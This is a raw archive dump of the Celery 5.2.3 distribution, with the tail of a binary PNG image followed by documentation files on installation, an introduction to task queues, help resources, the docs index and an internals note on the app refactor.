~$,Va=AKw@z;zq; ${Ivq1_hW$JbD4Q/eoD%fTF&rkʿTb&U $ WwE#\NתEfo|4JsB<$fN) L0Vח|Ҋ^@#G-&q+%fL &2b a{-Օs*c88|zvҫda*KޕRFYqL%U՟0EJ.t'-l/[( TbO͉Ʉ<'yᘮ`e]1nD\· |腨]_`'x ޔ?9凞LupMM쭷`5Jn|?ygUoU|D4HgJ4&zK_7-eC}w: vZ!v~7%p {q-Wb={ \Ⱥm|嫋Al'r* rO$"z2 Gn^*"3у\߿Љ-,JM&RlYчL'F҆brFz|<ީ!EE_$Md#H!5W,ıUNb椹:i=^eC$" T-02>s(LH"J՚#wn#bGf?Cϳ?aڈo/䦗i&a_!qH<>>_avyg$n{ںzMόF fLcqחN ^b7%O/cBl1ŀX$Y4B+ttOoUյ}y8u[=s>5WOU:u0>WF4|'?/gBgG?z\_w?_q }/?8H`ia`x6w?n4Y('T.#%9+׼Uv7F^~V *h͙-jV (w} _|iD2Uo|g78,e@_ Z2 =0@8C8Mx~oAPiN*do{s?Ղ2 =?a vfd\R3z{'0|w:zdn޳j$z] kF.tfBQ,.Uq'#2*.HSFw7 U!N%]m~`4Oby9Ѩ޻BDd[S,UYuJ֊"!&QK[.lysCEAS 9{U4#{ o{* W۟}Oף@>އ'k_裍Pӯi+U|ދ|QqX} >_xߺ}}=vٌ{p?`}vǣ{3X폾$m*xL}om#[4/h-ΣX ~mddu\f4kO;gDD" gNfddVkӎYl^Oޭ o5[E7 _Eˡ8 fM`GxJq3!&j֗\v=5֕`Niܟ 0z\݋At;2u%mg@gl:?P֨Id+Əqz]S}(,JMm[?_1kL(g?~xEKx[=q/o~]1>Uҷͯ=f8]]7Xa_FƣnnoWeo?xM"@W@s|}~*8`k }|/7W~֧/ӁGlY _x?[~擟> 7q6p2-ϻGJ1`$ޓX1Fu5kO^Aef27'###$-nF)3'=8Fſx vaWK,Όn@(ɒ炢#V_(/]NZȻ\]Σ@s_Hm8\ˎLs*Xv+9>9(8.\ABJ N)›mT%<2myƳя곪e)>?CX{ڳ}iudZ|/~x0~k'NxՈXXVamG-Qy~opm~-{~ xԱOK=MXpmoЊ#!F|q@Uxo|+ÅQ!p?2xߟ>NO?Dz`o  ˂}KB h82Ǩ%/CD\i# 0l¡٠^@eRWۢ)Ʒc2+^O:і /WO{&A˜~ds n~9M @&e0=1y+|-(rpT4LJە8IZ/x|IDvؕ$F"˱0l?zaD5G94W#9vCw ?^iT^K˿V({w=/|cO=>,Tqa-K(og>|_-̳Pjp>MOz4NƢJ_~0y砈 ~gl}a:W1˱c= 0ס*w g/Eo?%)g!dլ. 8wMv9>h_\UGy,-JԶڝ?֠'&- %|u<4C"I (&LJn$2>xGU|ݿũx{3{7izǧ?`->N|Fo^x;~_x4_y|`xw㹯./*KB +o~)~~w~?O$[|r @q~ ^^pwQ98xqYT^;rɻoyƧUcrxןc p߃@@hkv)BOצ6ϡ8{%vTe֣P*Σ n*K2IeW$R&X?'p I\ ,}w|iCih|zwzߤ]/gq n~S+x#>z'<ۀ;(dY‘g7<vn֟S~'Ze֏|;ם/6z~ ? nc3px#k11=,yu mf{ߊoe`:v $:93ޮU TITSȕI$-x*ٓ?##㺇w/#O< 7SE|Y0[5jbe 7iÒo6 C l\QcM Ժ}e''jQ5z^J vzpEҬ}FpIIj!&M!~RRk,\!WM. \4WM,"*ER?r/⿿nU~e:QAO>4(([r|.d ܏-?qDvY|}GytMrJ-B$pY2po1Vd5=(E{z2ӉBͿA{c[*tD ҫ)=Ar;_Y6t{R; E˗ï͞a\IE65ҳ( חUp]]-F(?񡾿{O"<>sha+2+#.?;:$i_O ܗġn gQ\B|6  I u^~*EAs+&Pf f Ofgdd\ȂyqQZmmqL)7 XY[7XBX:kɕ 'QV*ŰRu_8͝Xlj{:i'hz_Y? SU%`[EQI)$1-O_}a8_WDrEouFqA$dO9.o?zct:/ os7ctdFFuOW0 I3Oq' B_ ?K≯#Bg R"ǐPTw@5\čKh#BpczEEŒbtU?Y?Aۈi eĄa @;J56)fqvȪaz^ExIyZ v=1Eh}ރ"n# _$S$)g,=Z9:u *r; =HV^*xCT 6dtON3x{G\S-U k a?g_W|h>`[iyR yBƠkwZ):!,dXP^tĔrvڿ%dzB\5爒1:hîKȿ˽S\pAnM˥Z>Ȑ{_iqtxoF!#zv{ȿ,|#(G" [ƲȌ_O~E5}c"NCOgM 6.&ZϵBy)8b $ BSUt*̕#.IGjQ+Iyfzi ǣb"!rD᥀ (urh9 Ugs;)N5>8/~hZ]sX} `,pH5<oFD?o 'qJcՄm@s kljsZedd< 7<mVZsˁU0QHB4x[HujՆߵ*,$v-c9Ai$ MWˡ1L|FBEYl[]`a5ṹyH{S WWvTc812^ZHB!q>B5 ԧݺ1Pӣ- !%x^G>zjI@lc4(9nv=I1/5eկ!pH$h$08]ͭs (N޷c;@QRъ PsG$ddK]p=oK9cdFFL# ۨ<0V? 
Up\{"tچ?[F1Hۤ4ҙ9:z} 0EA(* ثױD>^oX%.yHow_@$k iM2fzŨic:WN=1|\2tü:]4E ܟwڻ/}x/_/}>i:n|m oo5?ޥW _}>| ^Ka%:aJ1ELㆎ+LNQn3P3O?| ow4Ҭop~mMozb?0 W+(=~@7]TȿP]eM*8Զ3ó_41Yt2ĝNaDwwûMXE!ŋ/$Ɋښ(oNc^?~pN=\XG$虮`;DŽ--֦81ƿPz'IVa;D?mɧVPb@ n49w ˥ Oe(F^ Ff %Ju#$&IVRF%w8Wk;+7죰bPג'Т &;m4]U9Qóov\?,r、jk2CSo׵LC#{YQD:܌3C+_JT*r9tMs>'Nĉ I|+Yq…ϒi"n b>Ē*ςڿ.(3 ̨a8aY8u̲v],HYD4kfwE{ L2Kƨ 6|84!3HIѕl!c,9xnGk0tC:@\+}J%VLIU] 8DOC={キ-纮܅S7̣ўǏ0#Ϳۿ=8{,Μ9W~W@ѵiyhw/x]8}l;^ς/^?q;⪫R%#: g[ď^$x|SS%soD#w/=ÛOмl:^WᵯЃ<ϖ*+;mVp݊p /?ߎWty _VK"+8~sحn>/"ڧ5>|7O~^Kz ҉9&é^u7:wq /Ht󘗴~o?|M:iO߅[ 43ݺ:KWZ |6;=xwa*21cKov@Xn7}%/ywkh_5,÷Zw"]_ֵ~ݧKiU 8/;mڃm5':uoG q Dk lb~~~ڛ0,򟑑1Y<EY B2Uo$s\`8aiR-QF>⾟-sXQkDWY7w_WVw(Npen~̝uF \9SI ܺM |P·3p3Ix[ߊ, m|{}Bz{ EzEaOmx(r0':eo֋(X(1HdĀփq$Ś'2} Eܐ۰OP2&Ra4Fq5ݎmxV5Ӫlc՞K 1d5:5!"8GPP ; H{q 4% Gm..ӈ* C"WtN ApG%!rv7"˃F4RYul"Nq@ {y;HB 1:i (r``ip$jG}6$YI!۱N[>@4X S;H;X!C;sP.^a 0Ɛ$*'j>$#݊=A'q%ni~ I$w':[%;lBN! :};E?i&~MTTc: WtG {{Y|t(χ_+Aj›,I蚎,3ER%eMȘYd^JIEQ[9Ѳӎ+hрt{<@Bj]yj{ /Vt]'Ɗ$f (rɌ7g`%1Z1:\/F!v4>~Bz(aS4DƓB ?!-3@tDiIX`9@Yɬ+1#J"1 fQ,J9BkIΐ222Y}e,b , ~$#)6պ;i'A1~d H\r!p-CHVz RpjD~w2nۭ :`-NuRPk4UHQ^mS0 .Z--BRdU:DXT&qt)%A-ʆrr״$&{6e'edd\H]<Z!ryhJߴ#պR (iv{puFӠ8jӊL,NdG:n{mAWtF%AH(GϚ5>8KkW߾<He_]KiQ"f2lҾ Vۋ,D:."x _ʰyaP ;~pae_I UȈfdLȘY2 $5Ydi=O:x (lZRӂ#֪t'i3puȼt%uN*%UUp)20+Y)mW;/An#]y2MwÊ"qI)6] 2D4:<z}Q78!RMNg~+og)*Y\XvS!3322fɓN/ȣm(.H`ڑc/VZO<5 yma"K'T h<*xqXL2%G|mLc|ʦۨ MƻF0\hj[Olf4stƋQIECF)[Щ&/8J.UQvwaqHA(Nx*_}cӎsTڊ˒ Bj2sSqS~XQ/HM1m6 "AwN:JiL@OsBٝ9*)mNUC7R1[aƳYR"&LE.KVWݘ\<gK!W֚Q5~z]*1?2g^VJZC5. *cdFFAݘ=1 x#ɌK, T&A#8ⰳJ bڑ{oR;RɽIKKLB8Q PXbAivbEf#ǐ(BD;Jy L'uj}uޟ\)jNCth7o,#*1&e[^$p;( þ/^K?|9lEmNefdFFL" h8Df#F ֝|l#tuC=V թ$^njS+ŚKi!AXeᷞ/() sf4Ө̳{u)]ve q>f={[Ӗ,9M^qhs%؈W]Z:Uڄw$& a9*Ջvε@fgdd$Z-eeU׍2$>zb6mJe1Wܙ5xyj9ns8RRd%N3rjV=E+!ި~F^tU靣 ؓ:)Lc|8}f;pF˺>ei$uY\" 2vHݽ,(Jy7`e)[,4t1h{+#"I{˨]m-a;l9d'խKW4CD2:n8#۹eTGqTKPNw<鲎!3,1Q"3Nfgdd$r@=}^T">"3W*JPjqui,aF#f,@AoQ߈]ƐDZNL<4Ş`)ӂAT[ir@?3\i,`c7)jNBM NG)/VR| x f50I;9Ǥ$yQ`{iIDE"!IhWo , mD3f}edd\H9E_8ޙ *'"f_LZ , b0x+Y1KN8ڜ x Ku#w |DZ>k gV vL#"k5K1>he<`j a*9DAB᫙V% { F>6J4vr᠌E,3d&$ߢ"2rIm1^ӑ1M4<oN3kk AE/(Όɒ3IX} ^C\K2}by:&Sݚa$nD%NhQr*Ak׊=!J ozS{@3µWv*z+=4ΰ$ߓq]fCf2V×RMGFRLPtg Ͱ51u{=h2x~Hm30T {kȘIZo?J,5joVom(0j2aaWz}?vyMi֊$'_2 PѤ4oJZ1;tcskz \[3h Wb%$L.y~^Z"^T =l# xVQAsx T vF߱)#񟑑1vҟ] 6_Cw"f[0[!| qTm :H2Rt:{V#:dO%k6m1f_$ ,;[ypN&=>H6$).OGhEpo`Y$,h$,Utgvdc˒jlmC! 
NQCKNȌDr h&3O3% "_/`F(՟N[װVsҢÉ9{d#;:sHHج2`8xDkDR¯IZ@*Ty F8Xh-%a,:*ooPB@Q$~tl1$%J"i[IFiu#r*rܺ8uf'3322fv3ڳ&J3Mjϧwm>zjN L#қ3aNwtz.tF#>+243XBfSa+"a5'y(Lau-[] AmÉTgb.,Hmh[;(reirr@Қp˔ڦYXՉU^'r1^'~FF9VSD-^lZpOXåfQie^0 @;y Jc-=1҇!%Md u{]1$"ʈU F]J9{V}X*1X}83˜- EB)8WFh3 E .ii @ъ3J6cdO#.^hѪ++eZu*EmzשOg-,±Qё)%A:X \ٌ='M67I3Їo G=e5 [ϡIfH`S<0=P7D "16ȿg;!{kl!C  *aӺ'6el'+3 ؙ@DGh6R|D52Ș9$%:>ah^핂ېB}hRh5BiD3P蜂Q1ۓr(+9 j7Uk[4\FA:F2e^F3הlg'YvJ#ȄF>;2!3322fL_ hiՆbE(|p4iz5Z%`8@p(vŘ2W΀~ٱYEI!kgwrGG$DdCu{貁BȢƢaP'3|뤛hC$"cߏQ`=Sq*)!(2Kz0z1H^F#R_iEF22?##cvFqIh5} UGMH&o~ͯl2CuR%i:0:Rpi GQ*])@)W)W,f4r9J1h+rZaNH O>!l6F#%X6YwmmĬOH%tWDi1( B "7Fh Bs+0i'H9?iu7-ٖϛ4 9g(F-3 dFFL!ۉݑ޾Máڬ/?y >h&NQ*A6vppᓼ46/C[G[N&0 *i:}q-#;-><"q_/9z'pI^특y:=ďoqtS{^KE@N<Kpkam{WXY Yo0>p밴z̷k5 h=#2r@Ƶ#୭u |"`襳> F;-6`ヷ@G[ Dz^aQyl> IꐤwHzP*.GaDqv5=uVH\俉6<ք6s)ܟwFصJfgddqZ咲aWV`F;DDkŸi/B(Y< h >Iy,*QhDmwBF)>×$g60 *{Pz]ӊ~!.*^gz;jFi,ry$%9:"c4dFFL'ZNX~uŁ+Or}nH/t7&ٓmt࡝088i&C"mz2&Nf ׾P 9W13I.3-|aq7'ӓ{t Kˣ3[H鍡(ς`'ohQH G5φ2TX $=^E=}VE<9cFS%c02?##cv-Iӱ /s.kcƤ"{vH ;n#WETcyN$m#w=YPW |ml$14(3ʼn'IFU8m9ߤD{BK 'Tp6 ^yDZZ GT tnD"\$gD2rrCp@WkȘ)ug+G} g AmNn:m'rw lCLřTd`8J(;_tVC7RMN$@뫴>>Wxks9g[HyN)m5[LO 5d 0 ^[ƑeH(Cd8b|hJ2ay;:- ^0fQPQ-L{ð8!i̒$?ʆ-CؖP3Ts#럆9F3ғ3ENI-Sń@ܔ~ھ ɗ "DdOȐnG sJSciO>V'VWFk8'E&GB{DM'[am|e"Ch!%T:޺."Bju*d[䍢=9}.nhOH= ]aih $6_vB>(si;4UsF:2?##cP(P*1?7"3 0l3y~4̇'|2;|cWE퀾ѣvZ/VHG>ih i )49nbhvAT_ |_:VA~]G  g KnnΏzH{U{4߳ZNeajh|kv %p㖦h4g"t@\Ui1 {xoB%,.-{^]ߝ8{v(^=嘛3.\ߏvUMoEwj= cd闓U~k^!k۰Og>AiajzV pa?ѱB|dF8mk#02HNs&lDzt`L*TV%wx1)humA[Ԋ2^ cL7 R .IzwA]U972Y^q 9^OJSύ\%(;PՃK2HcIȘvvv?})BX>ܭ43gK^r'獯C1n7z׻pgAtxb ;P밈̸#{|9Qlnϗ҉A\N+P hM Oo 4ц n/ e;o:EL>zYN&=K ˠu2q$!=p`"ï# ÕO'Puq"t}]?b|I4puѥS١IDATob4jDj]:8"D{!nqiȌakk !!IN\Xt3m>J)X,0 ؑ;ud<3#-/AJae49J%Ir~u`4  $'p~O?sxkx 3 n- M@Q4wQ*`K2p9AT<8CAv3 , )d_~/>f,3 _hο^0y&gdOS6qac?tb4pa4a -Y φ14qEļS#PplSƉ& 5Ym4'"e\`AHcVE*uGL@&'7v;r*EncJ>g( fNB33"4B)$/É)zi)k y 62?##cfP4lnnc}my7dU i*נit] IZX~b #v9<{]x37ߛӡ!j 2O>M2}Pz^i_oFQU<-bTSۂk=.7m>9vĹk;BϸwbeNou:UQtq[i+Cln:ll}'4[[#9οD,w&:>8n?뺎vbhr]G TrՎ܎=sQGW w4chVόZ"P k?껏OzIwww[m\)Rۀp)7skvt3'ZnAiy wv+sMry_3q^wVɌA<8/E.aS0h:|j$IP EU!+"2F=!xw}'dYq+ǡj:K8sUqJs=7ٟCxVVVg ?1?9_gΜw=ȪSW`p]p [o~ɹ3RWqu,~᝿\_/|xAtW^i[p}Gũ~^3{|'Q4Xc ?QK^^v<}[/~r܆/7䓐OVGWdl_w3]N?¥kFױre*Oo[X,OB.܆[nkc7}ɿku{kfFaj&j:>7;s*^oZ/} X?Oroxbamo{[oH6 ;gՅZ+18r8_n^^d첼:~+v1/': AP40_2`kmgs.28~ZsY[37D1=̭jY2Zm, Z7#h pᧄ ܿC7oO©n?&ك?< 8Cw4i>:.Ԯ`a)7meҳHR$cw%595hձQJ֍f)l8s6E2?##cfNz/޷x DZpG4(TXP^s=b#'\a}[2}:SǰW5'Ww', .<{e)#?֨?к;ل@Pd)+h6H$$pF@ЬI9:,-,cTht{|{챉Dq@,OT}Q. 4 g,Ѩɐw4kEAbc=Q#:/jX`]:_Qa[]6i|̇t91j322fVsN VV<}&!*xY̿$H?R9|>,. ~O@[rB\V˽,M GρZyI8i":_6Xkڅek FmG=m7EK&^. 
[binary image data omitted -- tail of a PNG from celery-5.2.3/docs/images/]

celery-5.2.3/docs/images/result_graph.png

[binary PNG image data omitted]

celery-5.2.3/docs/includes/

celery-5.2.3/docs/includes/installation.txt

.. _celery-installation:

Installation
============

You can install Celery either via the Python Package Index (PyPI)
or from source.

To install using :command:`pip`:

.. code-block:: console

    $ pip install -U Celery

.. _bundles:

Bundles
-------

Celery also defines a group of bundles that can be used
to install Celery and the dependencies for a given feature.

You can specify these in your requirements or on the :command:`pip`
command-line by using brackets. Multiple bundles can be specified by
separating them by commas.

.. code-block:: console

    $ pip install "celery[librabbitmq]"

    $ pip install "celery[librabbitmq,redis,auth,msgpack]"

The following bundles are available:

Serializers
~~~~~~~~~~~

:``celery[auth]``:
    for using the ``auth`` security serializer.

:``celery[msgpack]``:
    for using the msgpack serializer.

:``celery[yaml]``:
    for using the yaml serializer.

Concurrency
~~~~~~~~~~~

:``celery[eventlet]``:
    for using the :pypi:`eventlet` pool.

:``celery[gevent]``:
    for using the :pypi:`gevent` pool.

Transports and Backends
~~~~~~~~~~~~~~~~~~~~~~~

:``celery[librabbitmq]``:
    for using the librabbitmq C library.
:``celery[redis]``:
    for using Redis as a message transport or as a result backend.

:``celery[sqs]``:
    for using Amazon SQS as a message transport (*experimental*).

:``celery[tblib]``:
    for using the :setting:`task_remote_tracebacks` feature.

:``celery[memcache]``:
    for using Memcached as a result backend (using :pypi:`pylibmc`).

:``celery[pymemcache]``:
    for using Memcached as a result backend (pure-Python implementation).

:``celery[cassandra]``:
    for using Apache Cassandra as a result backend with the DataStax driver.

:``celery[couchbase]``:
    for using Couchbase as a result backend.

:``celery[arangodb]``:
    for using ArangoDB as a result backend.

:``celery[elasticsearch]``:
    for using Elasticsearch as a result backend.

:``celery[riak]``:
    for using Riak as a result backend.

:``celery[dynamodb]``:
    for using AWS DynamoDB as a result backend.

:``celery[zookeeper]``:
    for using Zookeeper as a message transport.

:``celery[sqlalchemy]``:
    for using SQLAlchemy as a result backend (*supported*).

:``celery[pyro]``:
    for using the Pyro4 message transport (*experimental*).

:``celery[slmq]``:
    for using the SoftLayer Message Queue transport (*experimental*).

:``celery[consul]``:
    for using the Consul.io Key/Value store as a message transport
    or result backend (*experimental*).

:``celery[django]``:
    specifies the lowest version possible for Django support.
    You should probably not use this in your requirements;
    it's here for informational purposes only.

.. _celery-installing-from-source:

Downloading and installing from source
--------------------------------------

Download the latest version of Celery from PyPI:

https://pypi.org/project/celery/

You can install it by doing the following:

.. code-block:: console

    $ tar xvfz celery-0.0.0.tar.gz
    $ cd celery-0.0.0
    $ python setup.py build
    # python setup.py install

The last command must be executed as a privileged user if
you aren't currently using a virtualenv.

.. _celery-installing-from-git:

Using the development version
-----------------------------

With pip
~~~~~~~~

The Celery development version also requires the development
versions of :pypi:`kombu`, :pypi:`amqp`, :pypi:`billiard`, and :pypi:`vine`.

You can install the latest snapshot of these using the following
pip commands:

.. code-block:: console

    $ pip install https://github.com/celery/celery/zipball/master#egg=celery
    $ pip install https://github.com/celery/billiard/zipball/master#egg=billiard
    $ pip install https://github.com/celery/py-amqp/zipball/master#egg=amqp
    $ pip install https://github.com/celery/kombu/zipball/master#egg=kombu
    $ pip install https://github.com/celery/vine/zipball/master#egg=vine

With git
~~~~~~~~

Please see the :ref:`Contributing <contributing>` section.

celery-5.2.3/docs/includes/introduction.txt

:Version: 5.2.3 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
:Keywords: task, queue, job, async, rabbitmq, amqp, redis,
  python, distributed, actors

--

What's a Task Queue?
====================

Task queues are used as a mechanism to distribute work across threads or
machines.

A task queue's input is a unit of work called a task. Dedicated worker
processes then constantly monitor the queue for new work to perform.

Celery communicates via messages, usually using a broker
to mediate between clients and workers.
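For instance, a minimal sketch of that flow (the module name ``tasks.py``,
the ``add`` task, and the Redis broker URL below are illustrative
assumptions, not part of the distribution):

.. code-block:: python

    # tasks.py -- a hypothetical module; start a worker for it with:
    #   celery -A tasks worker --loglevel=INFO
    from celery import Celery

    # Any supported broker works; this URL is only an example.
    app = Celery('tasks', broker='redis://localhost:6379/0')

    @app.task
    def add(x, y):
        # Runs inside a worker process, not in the caller.
        return x + y

.. code-block:: python

    # Client side: .delay() merely puts a message on the queue;
    # the broker hands it to whichever worker picks it up.
    from tasks import add

    result = add.delay(2, 2)  # returns an AsyncResult immediately

Retrieving the return value also requires a result backend to be configured.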
To initiate a task, a client puts a message on the queue; the broker
then delivers the message to a worker.

A Celery system can consist of multiple workers and brokers, giving way
to high availability and horizontal scaling.

Celery is written in Python, but the protocol can be implemented in any
language. In addition to Python there's node-celery_ and node-celery-ts_
for Node.js, and a `PHP client`_.

Language interoperability can also be achieved by using webhooks
in such a way that the client enqueues a URL to be requested by a worker.

.. _node-celery: https://github.com/mher/node-celery
.. _`PHP client`: https://github.com/gjedeer/celery-php
.. _node-celery-ts: https://github.com/IBM/node-celery-ts

What do I need?
===============

Celery version 5.1.x runs on:

- Python 3.6 or newer versions
- PyPy3.6 (7.3) or newer

From the next major version (Celery 6.x) Python 3.7 or newer is required.

If you're running an older version of Python, you need to be running
an older version of Celery:

- Python 2.6: Celery series 3.1 or earlier.
- Python 2.5: Celery series 3.0 or earlier.
- Python 2.4 was Celery series 2.2 or earlier.

Celery is a project with minimal funding, so we don't support
Microsoft Windows. Please don't open any issues related to that platform.

*Celery* is usually used with a message broker to send and receive messages.
The RabbitMQ and Redis transports are feature complete, but there's also
experimental support for a myriad of other solutions, including
using SQLite for local development.

*Celery* can run on a single machine, on multiple machines, or even
across datacenters.

Get Started
===========

If this is the first time you're trying to use Celery, or you're
new to Celery 5.0.x or 5.1.x coming from previous versions, then you
should read our getting started tutorials:

- `First steps with Celery`_

    Tutorial teaching you the bare minimum needed to get started
    with Celery.

- `Next steps`_

    A more complete overview, showing more features.

.. _`First steps with Celery`:
    http://docs.celeryproject.org/en/latest/getting-started/first-steps-with-celery.html

.. _`Next steps`:
    http://docs.celeryproject.org/en/latest/getting-started/next-steps.html

Celery is…
=============

- **Simple**

    Celery is easy to use and maintain, and does *not need configuration
    files*.

    It has an active, friendly community you can talk to for support,
    like at our `mailing-list`_, or the IRC channel.

    Here's one of the simplest applications you can make::

        from celery import Celery

        app = Celery('hello', broker='amqp://guest@localhost//')

        @app.task
        def hello():
            return 'hello world'

- **Highly Available**

    Workers and clients will automatically retry in the event of connection
    loss or failure, and some brokers support HA in the way of
    *Primary/Primary* or *Primary/Replica* replication.

- **Fast**

    A single Celery process can process millions of tasks a minute,
    with sub-millisecond round-trip latency (using RabbitMQ,
    py-librabbitmq, and optimized settings).

- **Flexible**

    Almost every part of *Celery* can be extended or used on its own:
    custom pool implementations, serializers, compression schemes,
    logging, schedulers, consumers, producers, broker transports,
    and much more.

It supports…
================

- **Message Transports**

    - RabbitMQ_, Redis_, Amazon SQS

- **Concurrency**

    - Prefork, Eventlet_, gevent_, single threaded (``solo``), thread

- **Result Stores**

    - AMQP, Redis
    - memcached
    - SQLAlchemy, Django ORM
    - Apache Cassandra, IronCache, Elasticsearch

- **Serialization**

    - *pickle*, *json*, *yaml*, *msgpack*.
    - *zlib*, *bzip2* compression.
    - Cryptographic message signing.

.. _`Eventlet`: http://eventlet.net/
.. _`gevent`: http://gevent.org/

.. _RabbitMQ: https://rabbitmq.com
.. _Redis: https://redis.io
.. _SQLAlchemy: http://sqlalchemy.org

Framework Integration
=====================

Celery is easy to integrate with web frameworks, some of which even have
integration packages:

    +--------------------+------------------------+
    | `Django`_          | not needed             |
    +--------------------+------------------------+
    | `Pyramid`_         | `pyramid_celery`_      |
    +--------------------+------------------------+
    | `Pylons`_          | `celery-pylons`_       |
    +--------------------+------------------------+
    | `Flask`_           | not needed             |
    +--------------------+------------------------+
    | `web2py`_          | `web2py-celery`_       |
    +--------------------+------------------------+
    | `Tornado`_         | `tornado-celery`_      |
    +--------------------+------------------------+

The integration packages aren't strictly necessary, but they can make
development easier, and sometimes they add important hooks like closing
database connections at ``fork``.

.. _`Django`: https://djangoproject.com/
.. _`Pylons`: http://pylonsproject.org/
.. _`Flask`: http://flask.pocoo.org/
.. _`web2py`: http://web2py.com/
.. _`Bottle`: https://bottlepy.org/
.. _`Pyramid`: http://docs.pylonsproject.org/en/latest/docs/pyramid.html
.. _`pyramid_celery`: https://pypi.org/project/pyramid_celery/
.. _`celery-pylons`: https://pypi.org/project/celery-pylons/
.. _`web2py-celery`: https://code.google.com/p/web2py-celery/
.. _`Tornado`: http://www.tornadoweb.org/
.. _`tornado-celery`: https://github.com/mher/tornado-celery/

.. _celery-documentation:

Documentation
=============

The `latest documentation`_ is hosted at Read The Docs, containing user
guides, tutorials, and an API reference.

.. _`latest documentation`: http://docs.celeryproject.org/en/latest/

celery-5.2.3/docs/includes/resources.txt

.. _getting-help:

Getting Help
============

.. _mailing-list:

Mailing list
------------

For discussions about the usage, development, and future of Celery,
please join the `celery-users`_ mailing list.

.. _`celery-users`: https://groups.google.com/group/celery-users/

.. _irc-channel:

IRC
---

Come chat with us on IRC. The **#celery** channel is located at the
`Libera Chat`_ network.

.. _`Libera Chat`: https://libera.chat/

.. _bug-tracker:

Bug tracker
===========

If you have any suggestions, bug reports, or annoyances, please report
them to our issue tracker at https://github.com/celery/celery/issues/

.. _wiki:

Wiki
====

https://github.com/celery/celery/wiki

.. _contributing-short:

Contributing
============

Development of `celery` happens at GitHub: https://github.com/celery/celery

You're highly encouraged to participate in the development
of `celery`. If you don't like GitHub (for some reason) you're welcome
to send regular patches.

Be sure to also read the `Contributing to Celery`_ section in the
documentation.

.. _`Contributing to Celery`:
    http://docs.celeryproject.org/en/master/contributing.html

.. _license:

License
=======

This software is licensed under the `New BSD License`. See the
:file:`LICENSE` file in the top distribution directory for the full
license text.

..
# vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/index.rst0000664000175000017500000000311500000000000015466 0ustar00asifasif00000000000000================================= Celery - Distributed Task Queue ================================= Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. Celery is Open Source and licensed under the `BSD License`_. Donations ========= This project relies on your generous donations. If you are using Celery to create a commercial product, please consider becoming our `backer`_ or our `sponsor`_ to ensure Celery's future. .. _`backer`: https://opencollective.com/celery#backer .. _`sponsor`: https://opencollective.com/celery#sponsor Getting Started =============== - If you're new to Celery you can get started by following the :ref:`first-steps` tutorial. - You can also check out the :ref:`FAQ `. .. _`BSD License`: http://www.opensource.org/licenses/BSD-3-Clause Contents ======== .. toctree:: :maxdepth: 1 copyright .. toctree:: :maxdepth: 2 getting-started/index userguide/index .. toctree:: :maxdepth: 1 django/index contributing community tutorials/index faq changelog whatsnew-5.2 reference/index internals/index history/index glossary Indices and tables ================== * :ref:`genindex` * :ref:`modindex` * :ref:`search` ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6277537 celery-5.2.3/docs/internals/0000775000175000017500000000000000000000000015624 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/app-overview.rst0000664000175000017500000001354100000000000021006 0ustar00asifasif00000000000000============================= "The Big Instance" Refactor ============================= The `app` branch is a work-in-progress to remove the use of a global configuration in Celery. Celery can now be instantiated and several instances of Celery may exist in the same process space. Also, large parts can be customized without resorting to monkey patching. Examples ======== Creating a Celery instance:: >>> from celery import Celery >>> app = Celery() >>> app.config_from_object('celeryconfig') >>> #app.config_from_envvar('CELERY_CONFIG_MODULE') Creating tasks: .. code-block:: python @app.task def add(x, y): return x + y Creating custom Task subclasses: .. code-block:: python Task = celery.create_task_cls() class DebugTask(Task): def on_failure(self, *args, **kwargs): import pdb pdb.set_trace() @app.task(base=DebugTask) def add(x, y): return x + y Starting a worker: .. code-block:: python worker = celery.Worker(loglevel='INFO') Getting access to the configuration: .. code-block:: python celery.conf.task_always_eager = True celery.conf['task_always_eager'] = True Controlling workers:: >>> celery.control.inspect().active() >>> celery.control.rate_limit(add.name, '100/m') >>> celery.control.broadcast('shutdown') >>> celery.control.discard_all() Other interesting attributes:: # Establish broker connection. 
>>> celery.broker_connection() # AMQP Specific features. >>> celery.amqp >>> celery.amqp.Router >>> celery.amqp.get_queues() >>> celery.amqp.get_task_consumer() # Loader >>> celery.loader # Default backend >>> celery.backend As you can probably see, this really opens up another dimension of customization abilities. Deprecated ========== * ``celery.task.ping`` ``celery.task.PingTask`` Inferior to the ping remote control command. Will be removed in Celery 2.3. Aliases (Pending deprecation) ============================= * ``celery.execute`` * ``.send_task`` -> {``app.send_task``} * ``.delay_task`` -> *no alternative* * ``celery.log`` * ``.get_default_logger`` -> {``app.log.get_default_logger``} * ``.setup_logger`` -> {``app.log.setup_logger``} * ``.get_task_logger`` -> {``app.log.get_task_logger``} * ``.setup_task_logger`` -> {``app.log.setup_task_logger``} * ``.setup_logging_subsystem`` -> {``app.log.setup_logging_subsystem``} * ``.redirect_stdouts_to_logger`` -> {``app.log.redirect_stdouts_to_logger``} * ``celery.messaging`` * ``.establish_connection`` -> {``app.broker_connection``} * ``.with_connection`` -> {``app.with_connection``} * ``.get_consumer_set`` -> {``app.amqp.get_task_consumer``} * ``.TaskPublisher`` -> {``app.amqp.TaskPublisher``} * ``.TaskConsumer`` -> {``app.amqp.TaskConsumer``} * ``.ConsumerSet`` -> {``app.amqp.ConsumerSet``} * ``celery.conf.*`` -> {``app.conf``} **NOTE**: All configuration keys are now named the same as in the configuration. So the key ``task_always_eager`` is accessed as:: >>> app.conf.task_always_eager instead of:: >>> from celery import conf >>> conf.always_eager * ``.get_queues`` -> {``app.amqp.get_queues``} * ``celery.utils.info`` * ``.humanize_seconds`` -> ``celery.utils.time.humanize_seconds`` * ``.textindent`` -> ``celery.utils.textindent`` * ``.get_broker_info`` -> {``app.amqp.get_broker_info``} * ``.format_broker_info`` -> {``app.amqp.format_broker_info``} * ``.format_queues`` -> {``app.amqp.format_queues``} Default App Usage ================= To be backward compatible, it must be possible to use all the classes/functions without passing an explicit app instance. This is achieved by having all app-dependent objects use :data:`~celery.app.default_app` 